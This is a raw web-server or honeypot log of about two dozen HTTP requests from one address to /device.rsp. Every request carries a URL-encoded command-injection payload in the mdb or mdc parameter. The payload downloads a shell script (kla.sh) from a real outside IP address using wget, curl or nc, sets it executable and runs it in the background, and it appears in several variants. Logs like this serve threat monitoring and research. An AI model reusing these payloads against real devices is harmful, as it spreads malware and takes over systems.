Query: opt=sys&cmd=__&cmd=__\_S\_O\_S\_T\_R\_E\_A\_MAX\_\_\_&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__&cmd=__\_S\_O\_S\_T\_R\_E\_A\_MAX\_\_\_&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: POST
[2026-03-20 17:35:02] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:53982
Query: opt=sys&cmd=__&cmd=___S_O_S_T_R_E_A_MAX___&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__&cmd=___S_O_S_T_R_E_A_MAX___&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: POST
[2026-03-20 17:34:49] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:58708
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: GET
[2026-03-20 17:34:39] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44844
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: POST
[2026-03-20 17:34:26] === HTTP Request ===
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44342
Query: opt=sys&&cmd=__S_O_S_T_R_E_A_MAX__&&mdb=sos&&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&&cmd=__S_O_S_T_R_E_A_MAX__&&mdb=sos&&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: POST
[2026-03-20 17:34:11] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:37546
Query: opt=sys&&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: POST
[2026-03-20 17:34:03] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44044
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: POST
[2026-03-20 17:33:48] === HTTP Request ===
===================
Body: opt=sys&cmd=__&cmd=___S_O_S_T_R_E_A_MAX___&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp%3B+rm+kla.sh%3B+wget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3B+chmod+777+%2A%3B+.%2Fkla.sh+tbk
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:47060
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:33:40] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:36706
Query: opt=sys&cmd=__&cmd=__\_S\_O\_S\_T\_R\_E\_A\_MAX\_\_\_&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp%3B+rm+kla.sh%3B+wget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3B+chmod+777+%2A%3B+.%2Fkla.sh+tbk
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__&cmd=__\_S\_O\_S\_T\_R\_E\_A\_MAX\_\_\_&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp%3B+rm+kla.sh%3B+wget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3B+chmod+777+%2A%3B+.%2Fkla.sh+tbk
Method: POST
[2026-03-20 17:33:20] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+kla.sh%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3Bchmod+777+%2A%3B.%2Fkla.sh+tbk
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:38498
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:33:09] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+kla.sh%3B+wget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3B+chmod+777+%2A%3B+.%2Fkla.sh+tbk
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:55446
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:32:54] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:59276
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+kla.sh%3B+wget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3B+chmod+777+%2A%3B+.%2Fkla.sh+tbk
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+kla.sh%3B+wget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3B+chmod+777+%2A%3B+.%2Fkla.sh+tbk
Method: GET
[2026-03-20 17:32:40] === HTTP Request ===
===================
Cookie: uid=admin
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:49178
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: GET
[2026-03-20 17:32:24] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:36108
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:32:07] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:36094
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:31:58] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44144
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: GET
[2026-03-20 17:31:40] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%7Csh+-s+tbk+%26&mdc=
Content-Length: 115
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44676
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:31:29] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+%2Ftmp%2Fkla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bsh+%2Ftmp%2Fkla.sh+tbk&mdc=
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44090
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:31:14] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:53344
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:30:57] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:43234
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: POST
[2026-03-20 17:30:46] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:43178
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: GET
[2026-03-20 17:30:33] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%09%2Ftmp%3Brm+-f%09kla.sh%3Bwget+-O%09kla.sh%09http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777%09kla.sh%3Bsh%09kla.sh%09tbk+%26
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
